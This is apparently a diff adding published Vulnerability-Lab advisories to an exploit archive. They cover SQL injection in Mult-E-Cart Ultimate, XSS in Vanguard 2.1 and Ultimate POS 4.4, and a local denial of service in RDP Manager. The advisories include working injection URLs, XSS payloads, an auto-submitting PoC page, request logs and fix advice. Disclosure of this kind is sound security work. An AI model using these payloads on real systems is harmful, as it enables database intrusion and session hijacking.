https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
-
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
PoC: Exploit
<html>
<head><body>
<title>Mult-E-Cart Ultimate - SQL Injection PoC</title>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--" width="400" height="400"><br>
<br>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@version--" width="400" height="400">
</body></head>
</html>
--- SQL Error Exception Handling Logs ---
SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100--
-
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute()
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
#14 {main}
-
Next yiidbException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=-1' in /home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): yiidbSchema->convertException(Object(PDOException), 'SELECT * FROM `...')
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
#14 {main}
Debug Array:
[0] => 42000
[1] => 1064
[2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
-
Reference(s):
https://multecartultimate.localhost:8080/vendor/vendor/view
https://multecartultimate.localhost:8080/customer/customer/view
https://multecartultimate.localhost:8080/inventory/inventory/update
https://multecartultimate.localhost:8080/order/sub-order/view-order
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following description ...
1. Disable to display the sql errors for other users then the admin or pipe it into a local log file outside the panel ui
2. Use a prepared statement to protect the query against further injection attacks
3. Restrict the vulnerable id parameter to disallow usage of special chars of post and get method requests
4. Encode and escape the id content on get method request with the id parameter
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

222
exploits/php/webapps/50491.txt Normal file
View file

@ -0,0 +1,222 @@
# Exploit Title: Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
# Version: 2.1
Document Title:
===============
Vanguard v2.1 - (Search) POST Inject Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2283
Release Date:
=============
2021-10-26
Vulnerability Laboratory ID (VL-ID):
====================================
2283
Common Vulnerability Scoring System:
====================================
4
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a post inject web vulnerability in the Vanguard v2.1 cms web-application.
Affected Product(s):
====================
VanguardInfini
Product: Vanguard v2.1 - CMS (PHP) (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A non-persistent post inject web vulnerability has been discovered in the official Vanguard v2.1 cms web-application.
The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user
session data or to manipulate application contents for clients.
The vulnerability is located in the phps_query parameter of the search module. The vulnerability is a classic post
injection web vulnerability with non-persistent attack vector.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of affected application modules.
Request method(s):
[+] POST
Vulnerable Input(s):
[+] Search
Vulnerable Parameter(s):
[+] phps_query
Proof of Concept (PoC):
=======================
The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
Vulnerable Source: search
<div class="ui yellow basic segment"></div>
<div class="ui container" style="margin-top: -0.7em;">
<form method="POST" action="https://vanguard.squamifer.ovh/search">
<div class="ui action input fluid">
<input name="phps_query" type="text" value=""><iframe src=a onload=alert(document.cookie)>" placeholder="Search for a product...">
<button class="ui button" type="submit" name="phps_search"><i class="search icon"></i>Search</button></div></form>
<div class="ui divider"></div>
<div class="ui cards aligned centered">
<div class="alert color blue-color"><div class="ui hidden divider"></div>
<div class="ui icon info message"><i class="help circle icon"></i><div class="content">
<div class="header">No results found for <strong><iframe src=evil.source onload=alert(document.cookie)></strong>.</div></div></div></div>
</div></div></div>
--- PoC Session Logs [POST] ---
https://vanguard.localhost:8080/search
Host: vanguard.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: https://vanguard.localhost:8080
Connection: keep-alive
Referer: https://vanguard.localhost:8080/
Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
phps_query=">%20<iframe src=evil.source onload=alert(document.cookie)>&phps_search=;)
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
pragma: no-cache
cache-control: private
vary: Accept-Encoding
Exploitation: PoC
<html>
<head>
<title>PoC</title>
<style type="text/css">
#nodisplay {
display:none;
}
</style>
</head>
<body>
<div id="nodsiplay">
<form action="https://vanguard.localhost:8080/search" method="post">
<input type="text" name="phps_query" value=">%20<iframe src=evil.source onload=alert(document.cookie)>"/>
</form>
</div>
<script>
function submitForm() {
document.forms[0].submit();
}
submitForm();
</script>
</body>
</html>
Security Risk:
==============
The security risk of the validation web vulnerability in the web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

257
exploits/php/webapps/50492.txt Normal file
View file

@ -0,0 +1,257 @@
# Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/
# Version: 4.4
Document Title:
===============
Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2296
Release Date:
=============
2021-10-26
Vulnerability Laboratory ID (VL-ID):
====================================
2296
Common Vulnerability Scoring System:
====================================
5.6
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The Ultimate POS is a erp, stock management, point of sale & invoicing web-application.
The application uses a mysql database management system in combination with php 7.2.
(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )
Abstract Advisory Information:
==============================
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the Ultimate POS v4.4 erp stock management web-application.
Affected Product(s):
====================
thewebfosters
Ultimate POS v4.4 - ERP (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent cross site web vulnerability has been discovered in the Ultimate POS v4.4 erp stock management web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent validation web vulnerability is located in the name parameter of the add products module.
Remote attackers with privileges as vendor to add products are able to inject own malicious script codes.
The request method to inject is post and the attack vector is persistent. Injects are possible via edit
or by a new create of a product.
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks,
persistent external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Products (Add)
Vulnerable Input(s):
[+] Product Name
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] Products List
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privileged application account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
test"><iframe src="evil.source" onload=alert(document.cookie)></iframe>
test"><img src="evil.source" onload=alert(document.cookie)></img>
---- PoC Session Logs (POST) [Add] ---
https://pos-uf.localhost.com:8000/products
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------241608710739044240961361918599
Content-Length: 3931
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/create
Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvV
nhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
_token=null&name=test"><iframe src=evil.source onload=alert(document.cookie)></iframe>&sku=&barcode_type=C128&unit_id=1&brand_id=
&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=
&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive
&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000
set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb
khvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly
---- PoC Session Logs (POST) [Edit] ---
https://pos-uf.localhost.com:8000/products/23
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------407073296625600179063246902867
Content-Length: 4064
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/23/edit
Cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D
_method=PUT&_token=null&name=test_products"><iframe src=evol.source onload=alert(document.cookie)></iframe>&sku=2&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locations[]=1&enable_stock=1&alert_quantity=2.00&product_description=&image=&product_brochure=&weight=4&product_custom_field1=3&product_custom_field2=5&product_custom_field3=1&product_custom_field4=2
&woocommerce_disable_sync=0&tax=&tax_type=exclusive&single_variation_id=204&single_dpp=1.00&single_dpp_inc_tax=1.00
&profit_percent=0.00&single_dsp=1.00&single_dsp_inc_tax=1.00&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000/products
set-cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmN
mIwYzljMTBmZGUwNzE0In0%3D; Max-Age=7200; path=/; httponly
Vulnerable Source: Products (list - name)
<tbody><tr data-href="https://pos-uf.localhost.com:8000/products/view/158" role="row" class="odd"><td class="selectable_td">
<input type="checkbox" class="row-select" value="158"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/img/default.png" alt="Product image" class="product-thumbnail-small"></div></td>
<td><div class="btn-group"><button type="button" class="btn btn-info dropdown-toggle btn-xs" data-toggle="dropdown" aria-expanded="false">
Actions<span class="caret"></span><span class="sr-only">Toggle Dropdown</span></button><ul class="dropdown-menu dropdown-menu-left" role="menu"><li>
<a href="https://pos-uf.localhost.com:8000/labels/show?product_id=158" data-toggle="tooltip" title="Print Barcode/Label"><i class="fa fa-barcode">
</i> Labels</a></li><li><a href="https://pos-uf.localhost.com:8000/products/view/158" class="view-product"><i class="fa fa-eye"></i> View</a></li>
<li><a href="https://pos-uf.localhost.com:8000/products/158/edit"><i class="glyphicon glyphicon-edit"></i> Edit</a></li><li>
<a href="https://pos-uf.localhost.com:8000/products/158" class="delete-product"><i class="fa fa-trash"></i> Delete</a></li><li class="divider">
</li><li><a href="#" data-href="https://pos-uf.localhost.com:8000/opening-stock/add/158" class="add-opening-stock"><i class="fa fa-database">
</i> Add or edit opening stock</a></li><li><a href="https://pos-uf.localhost.com:8000/products/stock-history/158"><i class="fas fa-history">
</i> Product stock history</a></li><li><a href="https://pos-uf.localhost.com:8000/products/create?d=158"><i class="fa fa-copy">
</i> Duplicate Product</a></li></ul></div></td><td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe>
<br><i class="fab fa-wordpress"></i></td><td>Awesome Shop</td><td><div style="white-space: nowrap;">$ 1.00 </div></td><td>
<div style="white-space: nowrap;">$ 1.25 </div></td><td> 0 Pieces</td><td>Single</td><td> </td><td></td><td></td><td>AS0158</td>
<td></td><td></td><td></td><td></td></tr><tr data-href="https://pos-uf.localhost.com:8000/products/view/17" role="row" class="even">
<td class="selectable_td"><input type="checkbox" class="row-select" value="17"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/uploads/img/1528727793_acerE15.jpg" alt="Product image" class="product-thumbnail-small"></div></td>
Reference(s):
https://pos-uf.localhost.com:8000/products/
https://pos-uf.localhost.com:8000/products/view/
https://pos-uf.localhost.com:8000/products/23/edit
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Restrict the input on product names to disallow special chars
2. Encode and filter the input transmitted via post in the name parameter
3. Escape and sanitize the output in the products listing of the backend
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

166
exploits/windows/local/50484.txt Normal file
View file

@ -0,0 +1,166 @@
# Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.cinspiration.de/uebersicht4.html
# Software Link: https://www.cinspiration.de/download.html
# Version: 4.9.9.3
# Tested on: Linux
Document Title:
===============
RDP Manager v4.9.9.3 - Local Denial of Servie Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2309
Release Date:
=============
2021-10-18
Vulnerability Laboratory ID (VL-ID):
====================================
2309
Common Vulnerability Scoring System:
====================================
3.6
Vulnerability Class:
====================
Denial of Service
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
RDP-Manager is a program for the better administration of several remote desktops and further connections. The connection parameters
as well as user name and password can be stored in the program, the latter also encrypted by an external password if desired. When opened,
the connections created are clearly structured in individual tabs in the application window, which means that the overview is retained even
if several connections are open.
(Copy of the Homepage: https://www.cinspiration.de/download.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local denial of service vulnerability in the RDP Manager v4.9.9.3 windows software client.
Vulnerability Disclosure Timeline:
==================================
2021-06-01: Researcher Notification & Coordination (Security Researcher)
2021-06-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
===============
Low
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official RDP Manager v4.9.9.3 windows software client.
The denial of service attack allows an attacker to freeze, block or crash a local process, service or component to compromise.
The local vulnerability is located in the Verbindungsname and Server input fields of the Verbindung (Neu/Bearbeiten).
The Verbindungsname and Server inputs are not limited by the size of characters. Thus allows a local privileged attacker
to add a malformed server entry with a large size that crashs (multiple application errors) the application permanently.
The entry can be modified as zip backup for imports as sqLitedatabase.db3 to make the software unusable until a full
reinstall with separate deletes is performed to recover.
Successful exploitation of the denial of service vulnerability results in permanent unhandled software and application crashs.
Vulnerable Input(s):
[+] Verbindungsname
[+] Server
Affected Module(s):
[+] Wiederherstellen (sqLitedatabase.db3)
Proof of Concept (PoC):
=======================
The local denial of service vulnerability can be exploited by attackers with system access privileges without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce ...
1. Install the RDP-Manager.exe software for windows
2. Start the software and add a new entry in the main tab
3. Include a large amount of characters max 1024 and save the entry
4. The software freezes and crashs with multiple errors in the actual session and after restart it crash permanently as well
Note: Alternativly you can export a database with regular valid entry and modify it via backup for a import
5. Successful reproduce of the local denial of service vulnerability!
Credits & Authors:
==================
N/A - Anonymous [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=N%2FA+-+Anonymous
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

17
files_exploits.csv
View file

@ -11410,6 +11410,7 @@ id,file,description,date,author,type,platform,port
50470,exploits/windows/local/50470.py,"Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
50471,exploits/windows/local/50471.py,"YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows,
50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
